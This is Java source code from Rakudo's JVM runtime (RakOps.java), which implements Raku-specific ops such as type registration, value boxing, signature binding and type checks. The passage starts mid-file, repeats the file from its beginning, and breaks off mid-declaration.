EMPTYARR; public SixModelObject EMPTYHASH; public RakudoJavaInterop rakudoInterop; public SixModelObject JavaHOW; boolean initialized; public GlobalExt(ThreadContext tc) {} } public static ContextKey<ThreadExt, GlobalExt> key = new ContextKey< >(ThreadExt.class, GlobalExt.class); /* Parameter hints for fast lookups. 
*/ private static final int HINT_CODE_DO = 0; private static final int HINT_CODE_SIG = 1; private static final int HINT_ROUTINE_RW = 8; private static final int HINT_SIG_PARAMS = 0; private static final int HINT_SIG_RETURNS = 1; private static final int HINT_SIG_CODE = 4; public static final int HINT_CD_OF = 0; public static final int HINT_CD_NAME = 1; public static final int HINT_CD_DEFAULT = 2; public static SixModelObject p6init(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (!gcx.initialized) { tc.gc.contConfigs.put("value_desc_cont", new RakudoContainerConfigurer()); SixModelObject BOOTArray = tc.gc.BOOTArray; gcx.EMPTYARR = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); SixModelObject BOOTHash = tc.gc.BOOTHash; gcx.EMPTYHASH = BOOTHash.st.REPR.allocate(tc, BOOTHash.st); gcx.rakudoInterop = new RakudoJavaInterop(tc.gc); gcx.initialized = true; } return null; } public static SixModelObject p6setitertype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Iterable = type; return type; } public static SixModelObject p6setassociativetype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Associative = type; return type; } public static SixModelObject p6setiterbuftype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.IterationBuffer = type; return type; } public static SixModelObject p6settypes(SixModelObject conf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Mu = conf.at_key_boxed(tc, "Mu"); gcx.Any = conf.at_key_boxed(tc, "Any"); gcx.Code = conf.at_key_boxed(tc, "Code"); gcx.Routine = conf.at_key_boxed(tc, "Routine"); gcx.Signature = conf.at_key_boxed(tc, "Signature"); gcx.Parameter = conf.at_key_boxed(tc, "Parameter"); gcx.Int = conf.at_key_boxed(tc, "Int"); gcx.Num = conf.at_key_boxed(tc, "Num"); gcx.Str = conf.at_key_boxed(tc, "Str"); gcx.List = conf.at_key_boxed(tc, "List"); gcx.IterationBuffer = conf.at_key_boxed(tc, "IterationBuffer"); gcx.Iterable = conf.at_key_boxed(tc, "Iterable"); gcx.Array = conf.at_key_boxed(tc, "Array"); gcx.Nil = conf.at_key_boxed(tc, "Nil"); gcx.Map = conf.at_key_boxed(tc, "Map"); gcx.Hash = conf.at_key_boxed(tc, "Hash"); gcx.Junction = conf.at_key_boxed(tc, "Junction"); gcx.Scalar = conf.at_key_boxed(tc, "Scalar"); gcx.Capture = conf.at_key_boxed(tc, "Capture"); gcx.ContainerDescriptor = conf.at_key_boxed(tc, "ContainerDescriptor"); gcx.False = conf.at_key_boxed(tc, "False"); gcx.True = conf.at_key_boxed(tc, "True"); gcx.Associative = conf.at_key_boxed(tc, "Associative"); gcx.JavaHOW = conf.at_key_boxed(tc, "Metamodel").st.WHO.at_key_boxed(tc, "JavaHOW"); return conf; } public static SixModelObject p6setautothreader(SixModelObject autoThreader, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.AutoThreader = autoThreader; return autoThreader; } public static SixModelObject p6configposbindfailover(SixModelObject p, SixModelObject pbf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Positional = p; gcx.PositionalBindFailover = pbf; return p; } public static SixModelObject booleanize(int x, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return x == 0 ? gcx.False : gcx.True; } public static SixModelObject p6definite(SixModelObject obj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return Ops.isnull(obj) == 1 || Ops.decont(obj, tc) instanceof TypeObject ? 
gcx.False : gcx.True; } public static SixModelObject p6box_i(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_u(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_n(double value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Num.st.REPR.allocate(tc, gcx.Num.st); res.set_num(tc, value); return res; } public static SixModelObject p6box_s(String value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Str.st.REPR.allocate(tc, gcx.Str.st); res.set_str(tc, value); return res; } public static SixModelObject p6argvmarray(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { SixModelObject BOOTArray = tc.gc.BOOTArray; SixModelObject res = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); for (int i = 0; i < csd.numPositionals; i++) { SixModelObject toBind; switch (csd.argFlags[i]) { case CallSiteDescriptor.ARG_INT: toBind = p6box_i((long)args[i], tc); break; case CallSiteDescriptor.ARG_UINT: toBind = p6box_u((long)args[i], tc); break; case CallSiteDescriptor.ARG_NUM: toBind = p6box_n((double)args[i], tc); break; case CallSiteDescriptor.ARG_STR: toBind = p6box_s((String)args[i], tc); break; default: toBind = Ops.hllize((SixModelObject)args[i], tc); break; } res.bind_pos_boxed(tc, i, toBind); } return res; } public static CallSiteDescriptor p6bindsig(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { /* Do any flattening before processing begins. */ CallFrame cf = tc.curFrame; if (csd.hasFlattening) { csd = csd.explodeFlattening(cf, args); args = tc.flatArgs; } cf.csd = csd; cf.args = args; /* Look up parameters to bind. */ if (DEBUG_MODE) { if (cf.codeRef.name != null) System.err.println("Binding for " + cf.codeRef.name); } GlobalExt gcx = key.getGC(tc); SixModelObject sig = cf.codeRef.codeObject .get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject params = sig .get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); /* Run binder, and handle any errors. */ Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, args, false, error)) { case Binder.BIND_RESULT_FAIL: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } case Binder.BIND_RESULT_JUNCTION: /* Invoke the auto-threader. */ csd = csd.injectInvokee(tc, args, cf.codeRef.codeObject); args = tc.flatArgs; Ops.invokeDirect(tc, gcx.AutoThreader, csd, args); Ops.return_o( Ops.result_o(cf), cf); /* Return null to indicate immediate return to the routine. 
*/ return null; } /* The binder may, for a variety of reasons, wind up calling Raku code and overwriting flatArgs, so it needs to be set at the end to return reliably */ tc.flatArgs = args; return csd; } public static SixModelObject p6bindcaptosig(SixModelObject sig, SixModelObject cap, ThreadContext tc) { CallFrame cf = tc.curFrame; GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd = Binder.explodeCapture(tc, gcx, cap); SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, tc.flatArgs, false, error)) { case Binder.BIND_RESULT_FAIL: case Binder.BIND_RESULT_JUNCTION: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } default: return sig; } } public static long p6isbindable(SixModelObject sig, SixModelObject cap, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd; Object[] args; if (cap instanceof CallCaptureInstance) { CallCaptureInstance cc = (CallCaptureInstance)cap; csd = cc.descriptor; args = cc.args; } else { csd = Binder.explodeCapture(tc, gcx, cap); args = tc.flatArgs; } SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); SixModelObject codeObj = sig.get_attribute_boxed(tc, gcx.Signature, "$!code", HINT_SIG_CODE); CodeRef cr = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); CallFrame cf = new CallFrame(tc, cr); try { switch (Binder.bind(tc, gcx, cf, params, csd, args, false, null)) { case Binder.BIND_RESULT_FAIL: return 0; default: return 1; } } finally { tc.curFrame = tc.curFrame.caller; } } private static final CallSiteDescriptor STORE = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor storeThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6store(SixModelObject cont, SixModelObject value, ThreadContext tc) { ContainerSpec spec = cont.st.ContainerSpec; if (spec != null) { spec.store(tc, cont, Ops.decont(value, tc)); } else { SixModelObject meth = Ops.findmethodNonFatal(cont, "STORE", tc); if (Ops.isnull(meth) == 0) { Ops.invokeDirect(tc, meth, STORE, new Object[] { cont, value }); } else { SixModelObject thrower = getThrower(tc, "X::Assignment::RO"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Cannot assign to a non-container"); else Ops.invokeDirect(tc, thrower, storeThrower, new Object[] { cont }); } } return cont; } private static final CallSiteDescriptor genIns = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor rvThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); if (rtype != null) { /* The return type could be generic. In that case we have * to call instantiate_generic before doing the type check. 
*/ SixModelObject HOW = rtype.st.HOW; SixModelObject archetypesMeth = Ops.findmethod(HOW, "archetypes", tc); Ops.invokeDirect(tc, archetypesMeth, Ops.invocantCallSite, new Object[] { HOW, rtype }); SixModelObject Archetypes = Ops.result_o(tc.curFrame); SixModelObject genericMeth = Ops.findmethodNonFatal(Archetypes, "generic", tc); if (genericMeth != null) { Ops.invokeDirect(tc, genericMeth, Ops.invocantCallSite, new Object[] { Archetypes }); if (Ops.istrue(Ops.result_o(tc.curFrame), tc) == 1) { SixModelObject ig = Ops.findmethod(HOW, "instantiate_generic", tc); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject cc = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)cc).context = tc.curFrame; Ops.invokeDirect(tc, ig, genIns, new Object[] { HOW, rtype, cc }); rtype = Ops.result_o(tc.curFrame); } } SixModelObject decontValue = Ops.decont(rv, tc); if (Ops.istype(decontValue, rtype, tc) == 0) { /* Straight type check failed, but it's possible we're returning * an Int that can unbox into an int or similar. */ StorageSpec spec = rtype.st.REPR.get_storage_spec(tc, rtype.st); if (spec.inlineable == 0 || Ops.istype(rtype, decontValue.st.WHAT, tc) == 0) { if (Ops.istype(decontValue.st.WHAT, bypassType, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Return"); if (thrower == null) throw ExceptionHandling.dieInternal(tc, "Type check failed for return value"); else Ops.invokeDirect(tc, thrower, rvThrower, new Object[] { decontValue, rtype }); } } } } return rv; } private static final CallSiteDescriptor baThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6bindassert(SixModelObject value, SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (type != gcx.Mu) { SixModelObject decont = Ops.decont(value, tc); if (Ops.istype(decont, type, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Binding"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Type check failed in binding"); else Ops.invokeDirect(tc, thrower, baThrower, new Object[] { value, type }); } } return value; } public static SixModelObject p6capturelex(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); StaticCodeInfo wantedStaticInfo = closure.staticInfo.outerStaticInfo; if (tc.curFrame.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame; else if (tc.curFrame.outer.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame.outer; return codeObj; } public static SixModelObject p6getouterctx(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); codeObj = Ops.decont(codeObj, tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = closure.outer; return wrap; } public static SixModelObject p6captureouters2(SixModelObject capList, SixModelObject target, ThreadContext tc) { if (!(target instanceof CodeRef)) ExceptionHandling.dieInternal(tc, "p6captureouters target must be a CodeRef"); CallFrame cf = ((CodeRef)target).outer; if (cf == null) return capList; long elems = capList.elems(tc); for (long i = 0; i < elems; i++) { SixModelObject closure = capList.at_pos_boxed(tc, i); CallFrame ctxToDiddle = ((CodeRef)closure).outer; 
ctxToDiddle.outer = cf; } return capList; } public static SixModelObject p6bindattrinvres(SixModelObject obj, SixModelObject ch, String name, SixModelObject value, ThreadContext tc) { obj.bind_attribute_boxed(tc, Ops.decont(ch, tc), name, STable.NO_HINT, value); if (obj.sc != null) Ops.scwbObject(tc, obj); return obj; } public static SixModelObject getThrower(ThreadContext tc, String type) { SixModelObject exHash = Ops.gethllsym("Raku", "P6EX", tc); return exHash == null ? null : Ops.atkey(exHash, type, tc); } private static CallFrame find_common_ctx(CallFrame ctx1, CallFrame ctx2) { int depth1 = 0; int depth2 = 0; CallFrame ctx; for (ctx = ctx1; ctx != null; ctx = ctx.caller, depth1++) if (ctx == ctx2) return ctx; for (ctx = ctx2; ctx != null; ctx = ctx.caller, depth2++) if (ctx == ctx1) return ctx; for (; depth1 > depth2; depth2++) ctx1 = ctx1.caller; for (; depth2 > depth1; depth1++) ctx2 = ctx2.caller; while (ctx1 != ctx2) { ctx1 = ctx1.caller; ctx2 = ctx2.caller; } return ctx1; } private static SixModelObject getremotelex(CallFrame pad, String name) { /* use for sub_find_pad */ CallFrame curFrame = pad; while (curFrame != null) { Integer found = curFrame.codeRef.staticInfo.oTryGetLexicalIdx(name); if (found != null) return curFrame.oLex[found]; curFrame = curFrame.outer; } return null; } public static String tclc(String in, ThreadContext tc) { if (in.length() == 0) return in; int first = in.codePointAt(0); return new String(Character.toChars(Character.toTitleCase(first))) + in.substring(Character.charCount(first)).toLowerCase(); } public static long p6stateinit(ThreadContext tc) { return tc.curFrame.stateInit ? 1 : 0; } public static SixModelObject p6setfirstflag(SixModelObject codeObj, ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.firstPhaserCodeBlock = codeObj; return codeObj; } public static long p6takefirstflag(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); boolean matches = tcx.firstPhaserCodeBlock == tc.curFrame.codeRef; tcx.firstPhaserCodeBlock = null; return matches ? 1 : 0; } public static SixModelObject p6setpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.add(tc.curFrame); return null; } public static SixModelObject p6clearpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.remove(tc.curFrame); return null; } public static long p6inpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); return tcx.prePhaserFrames.remove(tc.curFrame.caller) ? 1 : 0; } private static final CallSiteDescriptor dispVivifier = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor dispThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_STR }, null); public static SixModelObject p6finddispatcher(String usage, ThreadContext tc) { SixModelObject dispatcher = null; CallFrame ctx = tc.curFrame.caller; while (ctx != null) { /* Do we have a dispatcher here? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher != null) { dispatcher = maybeDispatcher; if (dispatcher instanceof TypeObject) { /* Need to vivify it. 
*/ SixModelObject meth = Ops.findmethod(dispatcher, "vivify_for", tc); SixModelObject p6sub = ctx.codeRef.codeObject; SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = ctx; SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; Ops.invokeDirect(tc, meth, dispVivifier, new Object[] { dispatcher, p6sub, wrap, cc }); dispatcher = Ops.result_o(tc.curFrame); ctx.oLex[dispLexIdx] = dispatcher; } break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (dispatcher == null) { SixModelObject thrower = getThrower(tc, "X::NoDispatcher"); if (thrower == null) { ExceptionHandling.dieInternal(tc, usage + " is not in the dynamic scope of a dispatcher"); } else { Ops.invokeDirect(tc, thrower, dispThrower, new Object[] { usage }); } } return dispatcher; } public static SixModelObject p6argsfordispatcher(SixModelObject disp, ThreadContext tc) { SixModelObject result = null; CallFrame ctx = tc.curFrame; while (ctx != null) { /* Do we have the dispatcher we're looking for? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher == disp) { /* Found; grab args. */ SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; result = cc; break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (result == null) throw ExceptionHandling.dieInternal(tc, "Could not find arguments for dispatcher"); return result; } public static SixModelObject p6staticouter(SixModelObject code, ThreadContext tc) { if (code instanceof CodeRef) return ((CodeRef)code).staticInfo.outerStaticInfo.staticCode; else throw ExceptionHandling.dieInternal(tc, "p6staticouter must be used on a CodeRef"); } public static SixModelObject jvmrakudointerop(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return BootJavaInterop.RuntimeSupport.boxJava(gcx.rakudoInterop, gcx.rakudoInterop.getSTableForClass(RakudoJavaInterop.class)); } }
src/vm/jvm/runtime/org/raku/rakudo/RakOps.java
package org.raku.rakudo; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Comparator; import org.raku.nqp.runtime.*; import org.raku.nqp.sixmodel.*; import org.raku.nqp.sixmodel.reprs.CallCaptureInstance; import org.raku.nqp.sixmodel.reprs.ContextRefInstance; import org.raku.nqp.sixmodel.reprs.NativeRefInstance; import org.raku.nqp.sixmodel.reprs.VMArrayInstance; /** * Contains implementation of nqp:: ops specific to Rakudo */ @SuppressWarnings("unused") public final class RakOps { public static final boolean DEBUG_MODE = false; public static class ThreadExt { public SixModelObject firstPhaserCodeBlock; public ArrayList<CallFrame> prePhaserFrames = new ArrayList<CallFrame>(); public ThreadExt(ThreadContext tc) { } } public static class GlobalExt { public SixModelObject Mu; public SixModelObject Any; public SixModelObject Code; public SixModelObject Routine; public SixModelObject Signature; public SixModelObject Parameter; public SixModelObject Int; public SixModelObject Num; public SixModelObject Str; public SixModelObject List; public SixModelObject IterationBuffer; public SixModelObject Iterable; public SixModelObject Array; public SixModelObject Nil; public SixModelObject Map; public SixModelObject Hash; public SixModelObject Junction; public SixModelObject Scalar; public SixModelObject Capture; public SixModelObject ContainerDescriptor; public SixModelObject False; public SixModelObject True; public SixModelObject AutoThreader; public SixModelObject Positional; public SixModelObject PositionalBindFailover; public SixModelObject Associative; public SixModelObject EMPTYARR; public SixModelObject EMPTYHASH; public RakudoJavaInterop rakudoInterop; public SixModelObject JavaHOW; boolean initialized; public GlobalExt(ThreadContext tc) {} } public static ContextKey<ThreadExt, GlobalExt> key = new ContextKey< >(ThreadExt.class, GlobalExt.class); /* Parameter hints for fast lookups. 
*/ private static final int HINT_CODE_DO = 0; private static final int HINT_CODE_SIG = 1; private static final int HINT_ROUTINE_RW = 8; private static final int HINT_SIG_PARAMS = 0; private static final int HINT_SIG_RETURNS = 1; private static final int HINT_SIG_CODE = 4; public static final int HINT_CD_OF = 0; public static final int HINT_CD_NAME = 1; public static final int HINT_CD_DEFAULT = 2; public static SixModelObject p6init(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (!gcx.initialized) { tc.gc.contConfigs.put("value_desc_cont", new RakudoContainerConfigurer()); SixModelObject BOOTArray = tc.gc.BOOTArray; gcx.EMPTYARR = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); SixModelObject BOOTHash = tc.gc.BOOTHash; gcx.EMPTYHASH = BOOTHash.st.REPR.allocate(tc, BOOTHash.st); gcx.rakudoInterop = new RakudoJavaInterop(tc.gc); gcx.initialized = true; } return null; } public static SixModelObject p6setitertype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Iterable = type; return type; } public static SixModelObject p6setassociativetype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Associative = type; return type; } public static SixModelObject p6setiterbuftype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.IterationBuffer = type; return type; } public static SixModelObject p6settypes(SixModelObject conf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Mu = conf.at_key_boxed(tc, "Mu"); gcx.Any = conf.at_key_boxed(tc, "Any"); gcx.Code = conf.at_key_boxed(tc, "Code"); gcx.Routine = conf.at_key_boxed(tc, "Routine"); gcx.Signature = conf.at_key_boxed(tc, "Signature"); gcx.Parameter = conf.at_key_boxed(tc, "Parameter"); gcx.Int = conf.at_key_boxed(tc, "Int"); gcx.Num = conf.at_key_boxed(tc, "Num"); gcx.Str = conf.at_key_boxed(tc, "Str"); gcx.List = conf.at_key_boxed(tc, "List"); gcx.IterationBuffer = conf.at_key_boxed(tc, "IterationBuffer"); gcx.Iterable = conf.at_key_boxed(tc, "Iterable"); gcx.Array = conf.at_key_boxed(tc, "Array"); gcx.Nil = conf.at_key_boxed(tc, "Nil"); gcx.Map = conf.at_key_boxed(tc, "Map"); gcx.Hash = conf.at_key_boxed(tc, "Hash"); gcx.Junction = conf.at_key_boxed(tc, "Junction"); gcx.Scalar = conf.at_key_boxed(tc, "Scalar"); gcx.Capture = conf.at_key_boxed(tc, "Capture"); gcx.ContainerDescriptor = conf.at_key_boxed(tc, "ContainerDescriptor"); gcx.False = conf.at_key_boxed(tc, "False"); gcx.True = conf.at_key_boxed(tc, "True"); gcx.Associative = conf.at_key_boxed(tc, "Associative"); gcx.JavaHOW = conf.at_key_boxed(tc, "Metamodel").st.WHO.at_key_boxed(tc, "JavaHOW"); return conf; } public static SixModelObject p6setautothreader(SixModelObject autoThreader, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.AutoThreader = autoThreader; return autoThreader; } public static SixModelObject p6configposbindfailover(SixModelObject p, SixModelObject pbf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Positional = p; gcx.PositionalBindFailover = pbf; return p; } public static SixModelObject booleanize(int x, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return x == 0 ? gcx.False : gcx.True; } public static SixModelObject p6definite(SixModelObject obj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return Ops.isnull(obj) == 1 || Ops.decont(obj, tc) instanceof TypeObject ? 
gcx.False : gcx.True; } public static SixModelObject p6box_i(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_u(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_n(double value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Num.st.REPR.allocate(tc, gcx.Num.st); res.set_num(tc, value); return res; } public static SixModelObject p6box_s(String value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Str.st.REPR.allocate(tc, gcx.Str.st); res.set_str(tc, value); return res; } public static SixModelObject p6argvmarray(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { SixModelObject BOOTArray = tc.gc.BOOTArray; SixModelObject res = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); for (int i = 0; i < csd.numPositionals; i++) { SixModelObject toBind; switch (csd.argFlags[i]) { case CallSiteDescriptor.ARG_INT: toBind = p6box_i((long)args[i], tc); break; case CallSiteDescriptor.ARG_UINT: toBind = p6box_u((long)args[i], tc); break; case CallSiteDescriptor.ARG_NUM: toBind = p6box_n((double)args[i], tc); break; case CallSiteDescriptor.ARG_STR: toBind = p6box_s((String)args[i], tc); break; default: toBind = Ops.hllize((SixModelObject)args[i], tc); break; } res.bind_pos_boxed(tc, i, toBind); } return res; } public static CallSiteDescriptor p6bindsig(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { /* Do any flattening before processing begins. */ CallFrame cf = tc.curFrame; if (csd.hasFlattening) { csd = csd.explodeFlattening(cf, args); args = tc.flatArgs; } cf.csd = csd; cf.args = args; /* Look up parameters to bind. */ if (DEBUG_MODE) { if (cf.codeRef.name != null) System.err.println("Binding for " + cf.codeRef.name); } GlobalExt gcx = key.getGC(tc); SixModelObject sig = cf.codeRef.codeObject .get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject params = sig .get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); /* Run binder, and handle any errors. */ Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, args, false, error)) { case Binder.BIND_RESULT_FAIL: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } case Binder.BIND_RESULT_JUNCTION: /* Invoke the auto-threader. */ csd = csd.injectInvokee(tc, args, cf.codeRef.codeObject); args = tc.flatArgs; Ops.invokeDirect(tc, gcx.AutoThreader, csd, args); Ops.return_o( Ops.result_o(cf), cf); /* Return null to indicate immediate return to the routine. 
*/ return null; } /* The binder may, for a variety of reasons, wind up calling Raku code and overwriting flatArgs, so it needs to be set at the end to return reliably */ tc.flatArgs = args; return csd; } public static SixModelObject p6bindcaptosig(SixModelObject sig, SixModelObject cap, ThreadContext tc) { CallFrame cf = tc.curFrame; GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd = Binder.explodeCapture(tc, gcx, cap); SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, tc.flatArgs, false, error)) { case Binder.BIND_RESULT_FAIL: case Binder.BIND_RESULT_JUNCTION: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } default: return sig; } } public static long p6isbindable(SixModelObject sig, SixModelObject cap, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd; Object[] args; if (cap instanceof CallCaptureInstance) { CallCaptureInstance cc = (CallCaptureInstance)cap; csd = cc.descriptor; args = cc.args; } else { csd = Binder.explodeCapture(tc, gcx, cap); args = tc.flatArgs; } SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); SixModelObject codeObj = sig.get_attribute_boxed(tc, gcx.Signature, "$!code", HINT_SIG_CODE); CodeRef cr = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); CallFrame cf = new CallFrame(tc, cr); try { switch (Binder.bind(tc, gcx, cf, params, csd, args, false, null)) { case Binder.BIND_RESULT_FAIL: return 0; default: return 1; } } finally { tc.curFrame = tc.curFrame.caller; } } private static final CallSiteDescriptor STORE = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor storeThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6store(SixModelObject cont, SixModelObject value, ThreadContext tc) { ContainerSpec spec = cont.st.ContainerSpec; if (spec != null) { spec.store(tc, cont, Ops.decont(value, tc)); } else { SixModelObject meth = Ops.findmethodNonFatal(cont, "STORE", tc); if (Ops.isnull(meth) == 0) { Ops.invokeDirect(tc, meth, STORE, new Object[] { cont, value }); } else { SixModelObject thrower = getThrower(tc, "X::Assignment::RO"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Cannot assign to a non-container"); else Ops.invokeDirect(tc, thrower, storeThrower, new Object[] { cont }); } } return cont; } private static 